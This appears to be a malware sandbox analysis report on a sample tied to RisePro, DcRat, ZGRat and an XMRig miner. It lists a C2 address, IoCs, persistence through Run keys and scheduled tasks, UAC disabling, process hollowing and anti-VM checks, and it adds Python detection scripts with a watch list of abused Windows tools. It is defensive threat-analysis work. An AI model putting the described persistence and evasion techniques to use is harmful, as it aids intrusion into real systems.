Resubmissions
  Date              Analysis ID        Score
  16-02-2024 02:54  240216-dd14ysfc71  10
  16-02-2024 01:10  240216-bjwqbaea93  10
  09-02-2024 16:00  240209-tfl1taed86  10
  09-02-2024 13:49  240209-q4sxgsbf9v  10
  06-02-2024 16:58  240206-vg3kmadccn  10
  06-02-2024 00:32  240206-avq4jadbfj  10

Analysis
  max time kernel:  278s
  max time network: 338s
  platform:         windows10-2004_x64
  resource:         win10v2004-20231215-en
  resource tags:    arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
  submitted:        16-02-2024 02:54
Static task
  static1

Behavioral tasks (all run the same sample, 4363463463464363463463463.bin.exe)
  behavioral1  win7-20231129-en
  behavioral2  win10-20240214-en
  behavioral3  win10v2004-20231215-en
  behavioral4  win11-20240214-en
General
  Target:  4363463463464363463463463.bin.exe
  Size:    10KB
  MD5:     2a94f3960c58c6e70826495f76d00b85
  SHA1:    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
  SHA256:  2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
  SHA512:  fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
  SSDEEP:  192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
  Extracted family: risepro
  C2:               193.233.132.62:50500
Signatures
  (The memory dumps cited below are prefixed behavioral3/, i.e. they come from the win10v2004-20231215-en run.)

DcRat
  DarkCrystal (DC) RAT is a .NET RAT, active since June 2019, capable of loading additional plugins.

Detect Fabookie payload (2 IoCs)
  behavioral3/memory/2876-43-0x00000000034E0000-0x000000000360C000-memory.dmp  family_fabookie
  behavioral3/memory/2876-66-0x00000000034E0000-0x000000000360C000-memory.dmp  family_fabookie
  (PID 2876 is rty47.exe; see "Executes dropped EXE".)
Detect ZGRat V1 (44 IoCs)
  Files:
    C:\Users\Admin\AppData\Local\Temp\Files\ma.exe  family_zgrat_v1 (3 hits)
    C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe  family_zgrat_v1 (3 hits; the file is literally named ".exe", which is why a process called ".exe" appears throughout this report)
    C:\Users\Admin\AppData\Local\Temp\main\extracted\winhostDhcp.exe  family_zgrat_v1
    C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe  family_zgrat_v1
    C:\Windows\DigitalLocker\en-US\SppExtComObj.exe  family_zgrat_v1
    C:\odt\conhost.exe  family_zgrat_v1 (2 hits)
  Memory dumps:
    behavioral3/memory/1324-64-0x0000000000240000-0x0000000000744000-memory.dmp  family_zgrat_v1  (PID 1324 = ma.exe)
    behavioral3/memory/3780-106-0x0000000005630000-0x0000000005838000-memory.dmp  family_zgrat_v1  (PID 3780 = native.exe)
    behavioral3/memory/3780-N-0x0000000005630000-0x0000000005833000-memory.dmp  family_zgrat_v1, for N in 107, 108, 110, 112, 114, 116, 124, 126, 128, 130, 132, 138, 140, 143, 146, 148, 150, 152, 154, 156, 158, 160, 163, 165, 167, 169, 178, 180, 182, 184 (30 dumps)
    behavioral3/memory/2020-583-0x0000000000A80000-0x0000000000D62000-memory.dmp  family_zgrat_v1  (PID 2020 = winhostDhcp.exe)
Process spawned unexpected child process (36 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro. Here, however, the parent in every record is C:\Windows\system32\wbem\wmiprvse.exe, the WMI Provider Host: a process created through WMI (Win32_Process.Create) is parented to wmiprvse.exe, so these entries are consistent with the dropped components registering scheduled tasks via WMI rather than with wmiprvse.exe itself being exploited.
  Parent: C:\Windows\system32\wbem\wmiprvse.exe (PID 384); child: schtasks.exe, PIDs
    4040, 1756, 2724, 3184, 1028, 2200, 3932, 4552, 3424, 3100, 4916, 540, 4576, 3284, 4416, 444, 3356, 2864, 6328, 5492, 6068, 6164, 6184, 6332, 4292, 6692, 3528, 5192, 5260, 6608, 6644, 6720, 5600, 5732, 5680, 5184
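As an added example (not part of the sandbox report), the following Python parses the flattened "Parent ... is not expected to spawn this process" records above into events and applies the check a detection engineer would write for them: flag execution proxies such as schtasks.exe whose parent is wmiprvse.exe, and count them per parent PID so that a burst like the 36 tasks under PID 384 stands out. The first three records in SAMPLE are copied from the report; the fourth (msiexec.exe) record is constructed to show a child the rule ignores, and the watch list is an assumed baseline.

```python
"""Flag execution proxies launched from the WMI Provider Host.

Added example for this report, not sandbox code. The first three records in
SAMPLE are copied from the "Process spawned unexpected child process" section;
the fourth is constructed to show a child that the rule ignores. The watch
list WMI_SUSPICIOUS_CHILDREN is an assumed baseline to tune per environment.
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    parent_image: str


# Shape of one flattened sandbox record: "... this process PID PPID image".
_RECORD = re.compile(
    r"Parent (?P<parent>\S+) is not expected to spawn this process "
    r"(?P<pid>\d+) (?P<ppid>\d+) (?P<image>\S+)"
)

# LOLBins that a dropper has no reason to start through Win32_Process.Create.
WMI_SUSPICIOUS_CHILDREN = {
    "schtasks.exe", "cmd.exe", "powershell.exe", "wscript.exe",
    "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
}


def image_name(path: str) -> str:
    """Lower-case file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_report(text: str) -> list:
    """Turn the run-together signature text into ProcEvent objects."""
    return [
        ProcEvent(int(m["pid"]), int(m["ppid"]), m["image"], m["parent"])
        for m in _RECORD.finditer(text)
    ]


def wmi_spawn_findings(events) -> list:
    """(ppid, pid, child) for watched children whose parent is wmiprvse.exe.

    A process created with WMI's Win32_Process.Create is parented to
    wmiprvse.exe, so a burst of schtasks.exe under one wmiprvse.exe PID
    means something is registering scheduled tasks through WMI.
    """
    return [
        (e.ppid, e.pid, image_name(e.image))
        for e in events
        if image_name(e.parent_image) == "wmiprvse.exe"
        and image_name(e.image) in WMI_SUSPICIOUS_CHILDREN
    ]


def bursting_parents(findings, threshold: int = 3) -> dict:
    """wmiprvse.exe PIDs whose watched-child count reaches the threshold."""
    counts = Counter(ppid for ppid, _, _ in findings)
    return {ppid: n for ppid, n in counts.items() if n >= threshold}


SAMPLE = (
    "Parent C:\\Windows\\system32\\wbem\\wmiprvse.exe is not expected to spawn "
    "this process 4040 384 schtasks.exe "
    "Parent C:\\Windows\\system32\\wbem\\wmiprvse.exe is not expected to spawn "
    "this process 1756 384 schtasks.exe "
    "Parent C:\\Windows\\system32\\wbem\\wmiprvse.exe is not expected to spawn "
    "this process 2724 384 schtasks.exe "
    # constructed record: a child outside the watch list is not reported
    "Parent C:\\Windows\\system32\\wbem\\wmiprvse.exe is not expected to spawn "
    "this process 9001 384 msiexec.exe"
)

if __name__ == "__main__":
    hits = wmi_spawn_findings(parse_report(SAMPLE))
    for ppid, pid, child in hits:
        print(f"wmiprvse.exe[{ppid}] -> {child}[{pid}]")
    print("bursting parents:", bursting_parents(hits))
```

On a live estate the same two functions apply unchanged to process-creation telemetry (for example Sysmon event ID 1) once the events are mapped onto ProcEvent; the threshold in bursting_parents is the knob that separates one legitimate WMI-driven task from a dropper registering dozens.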
  (untitled signature)
    miner.exe  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
  (untitled signature, YARA rule dcrat)
    C:\Users\Admin\AppData\Local\Temp\Files\fund.exe  dcrat
    C:\Users\Admin\Pictures\Saved Pictures\firefox.exe  dcrat
    C:\Users\Admin\Pictures\Saved Pictures\RCX7D30.tmp  dcrat
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
  CuxOU1F9RSuscwzIIgFo.exe  Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
XMRig Miner payload (2 IoCs)
  behavioral3/memory/1644-608-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
  behavioral3/memory/1644-673-0x0000000140000000-0x00000001407DC000-memory.dmp  xmrig
  (PID 1644 is vbc.exe, the target of SetThreadContext from .exe PID 2868; the xmrig payload runs injected into the Visual Basic .NET compiler process.)
Blocklisted process makes network request (5 IoCs)
  powershell.exe (PID 4072): flows 128, 128, 157, 191, 224
Disables Task Manager via registry modification

Downloads MZ/PE file
Drops file in Drivers directory (1 IoC)
  comSvc.exe  File opened for modification  C:\Windows\System32\drivers\etc\hosts
  (The report does not show what was written; on an infected host, diff the hosts file against a known-good copy.)
Checks BIOS information in registry (2 TTPs, 2 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  CuxOU1F9RSuscwzIIgFo.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
  CuxOU1F9RSuscwzIIgFo.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
Checks computer location settings (2 TTPs, 14 IoCs)
  Looks up the country code configured in the registry, likely a geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation, by
    4363463463464363463463463.bin.exe, miner.exe, 8Grb8KDhLIvSHwFX11Lr.exe, dvchost.exe, native.exe, fund.exe, bang_executor.exe (2), WScript.exe, winhostDhcp.exe, .exe (2), bugai.exe, executer.exe
Executes dropped EXE (33 IoCs)
  PID   Process
  2876  rty47.exe
  2096  bugai.exe
  1324  ma.exe
  3720  dvchost.exe
  2868  .exe
  3780  native.exe
  1304  7z.exe
  2584  7z.exe
  4316  7z.exe
  4080  7z.exe
  2020  winhostDhcp.exe
  3280  _wT.exe
  2888  NSudo.exe
  4044  32.exe
  1756  conhost.exe
  1844  BBLb.exe
  3764  native.exe
  4760  BBLb.exe
  4248  BBLb.exe
  5080  BBLb.exe
  3304  BBLb.exe
  1552  AttributeString.exe
  4956  AttributeString.exe
  452   .exe
  3284  miner.exe
  3856  8Grb8KDhLIvSHwFX11Lr.exe
  932   CuxOU1F9RSuscwzIIgFo.exe
  6476  fund.exe
  5544  bang_executor.exe
  6868  bang_executor.exe
  6152  bang_executor.exe
  4032  executer.exe
  4936  comSvc.exe
  Note that conhost.exe (1756) is a dropped file of that name (C:\odt\conhost.exe carries the ZGRat YARA hit), not the Windows console host, and NSudo.exe is a legitimate open-source elevation utility being used by the dropper.
Identifies Wine through registry keys (2 TTPs, 1 IoC)
  Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
  CuxOU1F9RSuscwzIIgFo.exe  Key opened  \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Software\Wine
Loads dropped DLL (4 IoCs)
  7z.exe: PIDs 1304, 2584, 4316, 4080
Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk, where infostealers often target it.

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.
  (untitled signature, YARA rule upx)
    behavioral3/memory/1644-608-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
    behavioral3/memory/1644-673-0x0000000140000000-0x00000001407DC000-memory.dmp  upx
Uses the VBS compiler for execution (1 TTP)
  vbc.exe (the Visual Basic .NET compiler; PIDs 1644 and 2700) appears only as an injection target: .exe PIDs 2868 and 452 set its thread context (see "Suspicious use of SetThreadContext"), and the xmrig and upx YARA hits above are in the memory of PID 1644.
Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  bugai.exe  Key opened  \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  bugai.exe  Key opened  \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  bugai.exe  Key opened  \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Adds Run key to start application (2 TTPs, 2 IoCs)
  bugai.exe  Set value (str)  \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe"
  reg.exe    Set value (str)  \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bang_executor = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\bang_executor.exe"
  (AppData\Local\Temp\RarSFX0 is the extraction directory WinRAR self-extracting archives use, so bang_executor.exe arrived inside an SFX archive; a Run entry pointing into %TEMP% is also a persistence path that breaks as soon as the temp directory is cleaned.)
Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
  (untitled signature)
    miner.exe  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
    miner.exe  Set value (int)    \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
  Setting EnableLUA to 0 switches UAC off system-wide; the change takes effect at the next reboot and, being an HKLM write, requires administrative rights.
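The two EnableLUA records above and the Run-key writes under "Adds Run key to start application" are the same kind of telemetry. As an added example (not sandbox code), this Python normalises such "Set value" records to HKLM/HKCU paths and classifies them: EnableLUA = "0" is reported as a UAC disable, and Run entries pointing into user-writable directories as high-severity persistence. The three records in SAMPLE are copied from this report; the explorer.exe record is a constructed benign control, and the severity rules and USER_WRITABLE list are an assumed baseline.

```python
"""Classify registry writes from a sandbox trace: UAC disable and Run-key persistence.

Added example for this report, not sandbox code. The three "Set value" records
in SAMPLE are copied from the sections above (EnableLUA = "0" by miner.exe and
the two Run keys); the explorer.exe record is constructed as a benign control.
The severity rules and USER_WRITABLE list are an assumed baseline.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class RegWrite:
    key: str      # normalised hive prefix, e.g. HKLM\SOFTWARE\...
    name: str
    value: str
    process: str


# One flattened record: Set value (type) \REGISTRY\...\Name = "value" process
_RECORD = re.compile(
    r'Set value \((?:int|str)\) (?P<path>\\REGISTRY\\.+?) = "(?P<value>.*?)" (?P<process>\S+)'
)
_USER_HIVE = re.compile(r"^\\REGISTRY\\USER\\S-1-5-21-[\d-]+\\", re.IGNORECASE)
_MACHINE_HIVE = "\\REGISTRY\\MACHINE\\"

# Locations an unprivileged process can write; a Run entry pointing here is
# the common dropper pattern (assumed list).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")


def normalise_key(path: str) -> str:
    """Map \\REGISTRY\\MACHINE and a per-user SID hive to HKLM / HKCU."""
    if path.upper().startswith(_MACHINE_HIVE):
        return "HKLM\\" + path[len(_MACHINE_HIVE):]
    m = _USER_HIVE.match(path)
    if m:
        return "HKCU\\" + path[m.end():]
    return path


def parse_records(text: str) -> list:
    out = []
    for m in _RECORD.finditer(text):
        key, _, name = normalise_key(m["path"]).rpartition("\\")
        # the sandbox doubles backslashes inside string values
        out.append(RegWrite(key, name, m["value"].replace("\\\\", "\\"), m["process"]))
    return out


def classify(w: RegWrite):
    """Return (category, severity) or None for writes we do not care about."""
    key = w.key.lower()
    if key.endswith("\\policies\\system") and w.name.lower() == "enablelua" and w.value == "0":
        return ("uac_disabled", "high")           # takes effect at next reboot
    if key.endswith(("\\currentversion\\run", "\\currentversion\\runonce")):
        in_user_dir = any(p in w.value.lower() for p in USER_WRITABLE)
        return ("run_key_persistence", "high" if in_user_dir else "medium")
    return None


def findings(writes) -> list:
    out = []
    for w in writes:
        hit = classify(w)
        if hit:
            out.append((hit[0], hit[1], w.process, f"{w.key}\\{w.name}"))
    return out


SAMPLE = "\n".join([
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" miner.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" bugai.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bang_executor = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\bang_executor.exe" reg.exe',
    # constructed benign control record
    r'Set value (int) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden = "1" explorer.exe',
])

if __name__ == "__main__":
    for f in findings(parse_records(SAMPLE)):
        print(f)
```

Normalising the SID-specific hive path to HKCU is what lets one rule match the same key across users and hosts; the same classify function can be fed Sysmon event ID 13 (registry value set) records once they are mapped onto RegWrite.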
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 8 IoCs)
  flow 83   raw.githubusercontent.com
  flow 84   raw.githubusercontent.com
  flow 124  raw.githubusercontent.com
  flow 198  bitbucket.org
  flow 199  bitbucket.org
  flow 214  discord.com
  flow 215  discord.com
  flow 220  discord.com
Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 132  ipinfo.io
  flow 133  ipinfo.io
AutoIT Executable (1 IoC)
  AutoIT scripts compiled to PE executables.
  C:\Users\Admin\AppData\Local\Temp\heidi1lYaOz_hhmA8\8Grb8KDhLIvSHwFX11Lr.exe  autoit_exe
Drops file in System32 directory (4 IoCs)
  bugai.exe  File created                  C:\Windows\System32\GroupPolicy\Machine\Registry.pol
  bugai.exe  File opened for modification  C:\Windows\System32\GroupPolicy\GPT.INI
  bugai.exe  File opened for modification  C:\Windows\System32\GroupPolicy
  bugai.exe  File opened for modification  C:\Windows\SysWOW64\GroupPolicy\gpt.ini
  Registry.pol and gpt.ini are the local Group Policy store: settings written there are re-applied at every policy refresh, so deleting the corresponding registry values alone does not undo them.
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  2096 bugai.exe; 932 CuxOU1F9RSuscwzIIgFo.exe
Suspicious use of SetThreadContext (7 IoCs)
  Source PID / image           Target PID / image
  2868  .exe                   1644  vbc.exe
  3780  native.exe             3764  native.exe
  1844  BBLb.exe               3304  BBLb.exe
  1552  AttributeString.exe    4956  AttributeString.exe
  4956  AttributeString.exe    3736  MSBuild.exe
  3736  MSBuild.exe            2624  MSBuild.exe
  452   .exe                   2700  vbc.exe
  Setting another process's thread context is the final step of RunPE-style process hollowing (create suspended, write the payload, redirect the entry point, resume). The AttributeString.exe entries chain three hops, ending in a second MSBuild.exe; the two vbc.exe targets are the processes carrying the xmrig YARA hits.
Drops file in Program Files directory (7 IoCs)
  comSvc.exe       File opened for modification  C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\vbc.exe
  comSvc.exe       File created                  C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\vbc.exe
  comSvc.exe       File created                  C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\508c29baf080ce
  comSvc.exe       File opened for modification  C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\RCX85A4.tmp
  comSvc.exe       File opened for modification  C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\RCX85B4.tmp
  winhostDhcp.exe  File created                  C:\Program Files\Reference Assemblies\Microsoft\bugai.exe
  winhostDhcp.exe  File created                  C:\Program Files\Reference Assemblies\Microsoft\7b4de844e4f5bc
  (Each dropped executable is paired with a 14-hex-character companion file in the same directory; the same pattern recurs under "Drops file in Windows directory" and is a usable file-system indicator for this campaign.)
Drops file in Windows directory (10 IoCs)
  winhostDhcp.exe  File created                  C:\Windows\Downloaded Program Files\csrss.exe
  winhostDhcp.exe  File opened for modification  C:\Windows\Downloaded Program Files\csrss.exe
  winhostDhcp.exe  File created                  C:\Windows\Downloaded Program Files\886983d96e3d3e
  winhostDhcp.exe  File created                  C:\Windows\DigitalLocker\en-US\SppExtComObj.exe
  winhostDhcp.exe  File created                  C:\Windows\DigitalLocker\en-US\e1ef82546f0b02
  comSvc.exe       File created                  C:\Windows\Globalization\Sorting\msedge.exe
  comSvc.exe       File opened for modification  C:\Windows\Globalization\Sorting\msedge.exe
  comSvc.exe       File created                  C:\Windows\Globalization\Sorting\61a52ddc9dd915
  comSvc.exe       File opened for modification  C:\Windows\Globalization\Sorting\RCX7B2A.tmp
  comSvc.exe       File opened for modification  C:\Windows\Globalization\Sorting\RCX7B2B.tmp
  The copies borrow the names of system and browser binaries (csrss.exe, SppExtComObj.exe, msedge.exe) but sit outside those binaries' legitimate directories; process names such as msedge.exe or conhost.exe elsewhere in this report therefore do not necessarily refer to the genuine executables.
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoC)
  WerFault.exe (PID 1008) handled a crash of 32.exe (PID 4044)
Checks processor information in registry (2 TTPs, 17 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  firefox.exe  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
  firefox.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision
  firefox.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature
  bugai.exe    Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
  bugai.exe    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
  msedge.exe   Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (4 times)
  msedge.exe   Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (4 times)
  msedge.exe   Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (4 times)
  The report gives no process paths here, so firefox.exe and msedge.exe may well be the dropped copies noted elsewhere (C:\Users\Admin\Pictures\Saved Pictures\firefox.exe with the dcrat YARA hit, C:\Windows\Globalization\Sorting\msedge.exe) rather than the browsers.
Creates scheduled task(s) (1 TTP, 40 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  schtasks.exe PIDs: 6720, 5680, 540, 3284, 4416, 436, 5192, 6608, 2724, 3184, 444, 2864, 4292, 3520, 3932, 6164, 6332, 4040, 1028, 2200, 6184, 3528, 1756, 4552, 4916, 4576, 5732, 5184, 3100, 3356, 5492, 5260, 4416, 6068, 6644, 5600, 3424, 752, 6328, 6692
  Thirty-six of these are the WMI-spawned instances listed under "Process spawned unexpected child process"; 3520 was launched by cmd.exe on behalf of .exe (PID 2868, see "Suspicious use of WriteProcessMemory"). The report does not show the task definitions; on a live host, list them with schtasks /query /v /fo LIST or read the XML under C:\Windows\System32\Tasks.
Delays execution with timeout.exe (1 IoC)
  852 timeout.exe (started by cmd.exe PID 3700 on behalf of ma.exe, see "Suspicious use of WriteProcessMemory")
Enumerates system info in registry (2 TTPs, 17 IoCs)
  msedge.exe  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (5 times)
  msedge.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
  msedge.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (4 times)
  msedge.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer
  chrome.exe  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (3 times)
  chrome.exe  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (3 times)
Modifies registry class (2 IoCs)
  fund.exe         Key created  \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\Local Settings
  winhostDhcp.exe  Key created  \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\Local Settings
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  2096 bugai.exe (2); 2868 .exe (2); 2020 winhostDhcp.exe (the remaining 60 entries)
Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  1756 conhost.exe (a dropped executable of that name, listed under "Executes dropped EXE", not the Windows console host)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (2 IoCs)
  1552 msedge.exe (2)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  SeDebugPrivilege: 4344 4363463463464363463463463.bin.exe; 1324 ma.exe; 2868 .exe; 3780 native.exe; 2020 winhostDhcp.exe; 1756 conhost.exe; 1844 BBLb.exe; 3304 BBLb.exe; 1144 powershell.exe; 1552 AttributeString.exe; 4956 AttributeString.exe; 3736 MSBuild.exe; 452 .exe; 756 powershell.exe; 2624 MSBuild.exe; 5000 powershell.exe; 2684 powershell.exe; 2480 Conhost.exe
  SeRestorePrivilege, 35, SeSecurityPrivilege (2): 7z.exe PIDs 1304, 2584, 4316, 4080
  SeLockMemoryPrivilege (2): 1644 vbc.exe; 2700 vbc.exe
  18446744065119617044: 2888 NSudo.exe
  2052 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  3788 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege
  Bare numbers are privilege LUIDs the sandbox did not resolve to names: 33 SeIncreaseWorkingSetPrivilege, 34 SeTimeZonePrivilege, 35 SeCreateSymbolicLinkPrivilege (7-Zip requests it to restore symbolic links), 36 SeDelegateSessionUserImpersonatePrivilege. The NSudo.exe value is 0xFFFFFFFE00000014 as an unsigned 64-bit number; its low 32 bits are 20 = SE_DEBUG_PRIVILEGE, so it is most likely a mis-rendered SeDebugPrivilege. SeLockMemoryPrivilege in the two vbc.exe processes is what XMRig requests to back its scratchpad with large pages, matching the xmrig YARA hits in PID 1644. The 2052 powershell.exe entry enables every privilege in its token at once, a pattern seen, for example, when a script uses WMI/CIM cmdlets.
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
vbc.exevbc.exe8Grb8KDhLIvSHwFX11Lr.exemsedge.exepid process 1644 vbc.exe 2700 vbc.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
pid process
